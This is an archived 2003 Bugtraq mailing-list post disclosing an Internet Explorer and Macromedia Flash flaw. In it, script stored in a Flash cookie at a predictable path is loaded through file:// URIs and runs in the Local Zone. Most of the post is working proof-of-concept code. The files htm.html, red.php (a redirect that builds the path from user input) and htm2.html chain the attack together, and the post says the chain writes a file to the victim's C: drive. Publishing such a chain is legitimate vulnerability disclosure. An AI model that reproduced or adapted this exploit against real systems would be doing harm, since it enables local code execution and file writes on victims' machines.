| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 02 Nov 2003 02:14:29 +0800
From: "Mindwarper *" <mindwarper@...uxmail.org>
To: "Thor Larholm" <thor@...x.com>
Cc: bugtraq@...urityfocus.com
Subject: Internet Explorer Vulnerability: Content-Location works with both
triple and double slash
After I reported the Content-Location Vulnerability (http://www.securityfocus.com/archive/1/342317),
Thor Larholm explained that the html execution was not caused by the Content-Location header, but instead
by the triple slash (file:///).
I have tested it with double slash and I even tested the triple slash without the Content-Location header,
but neither worked.
The difference between triple slash and double slash is that in triple htm.html loads the cookie in the iframe,
and with double slash it causes the whole page to try and load the cookie which would then require the user
to press Back and then refresh the page.
I have created 2 proof-of-concepts which show how both vulnerabilities can not be exploited separately.
1. http://mlsecurity.com/ie/wee.php
This page will create a flash cookie and when you press continue it will load htm.html which contains an iframe.
This iframe will load red.php which contains the Content-Location header pointing at the flash cookie.
The flash cookie location will only have a double slash (file://).
wee.php - Loads a flash movie which creates a cookie in
C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol
htm.html
******************************
<html>
<script type="text/javascript" src="querystring.js"></script>
<script>
document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D" + QueryString['a'] + "%26drive%3D" + QueryString['drive'] + "%22%3E%3C/iframe%3E"));
</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like .my_Array...0..Sven.1..kelor.2.
<p>
The script assumes you are under windows 2000/XP logged on as administrator.<br>
If you are not logged on as administrator type the username you're logged in under in the box below and press Go Go Go.<p>
<form method="GET">
Logged on to windows as user: <input type=text name="a" value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>
<p>
This should create a file called mlsecurity.txt in your c:\ drive.
<p>
<a href="exp.php">How it works?</a>
</html>
******************************
red.php
******************************
$a = $_GET["a"];
if(!$a || $a=="undefined")
{
$a="administrator";
}
if($_GET["drive"] && !strstr($_GET["drive"],"unde"))
{
$d=$_GET["drive"];
}else
{
$d="C";
}
header("Location: file://".$d.":/Documents and Settings/".$a."/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");
******************************
2. http://mlsecurity.com/ie/ie.php
This proof-of-concept only uses the triple slash method to open the cookie in an iframe.
ie.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol
htm2.html
******************************
<html>
<iframe src="file:///C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"></iframe>
<p>
Note: you might need to edit the html to fit your system.
<p>
Macromedia Flash Player is reported to store Flash cookies (.sol files) in a predictable location on client systems.
Other attacks are possible given the ability to store content on a system in a predictable location, such as
referencing the content via a file:// URI. This is compounded by the fact that an attacker could include HTML
and script code in the cookie, which may be interpreted by Internet Explorer or possibly other browsers.
In the example of Internet Explorer, such content would be interpreted in the context of the Local Zone.
Successful exploitation would still require the attacker to guess the local username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft Windows operating systems.
Other versions may also be affected. Macromedia Director MX is similarly affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has been determined to be a distinct
issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with additional technical details
describing a new issue in Internet Explorer. The original report for these issues was a proof-of-concept
provided by Mindwarper which exploited both of the issues simultaneously.
<p>
- Discovered by Mindwarper<br>
</html>
******************************
I have tested these pages on both win2k sp4 ie6 fully patched and on winXP.
I even tried using a few IE hacks and it still worked.
-----------------------------|
- Mindwarper |
- mindwarper@...uxmail.org |
- http://mlsecurity.com |
-----------------------------|
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze
Powered by blists - more mailing lists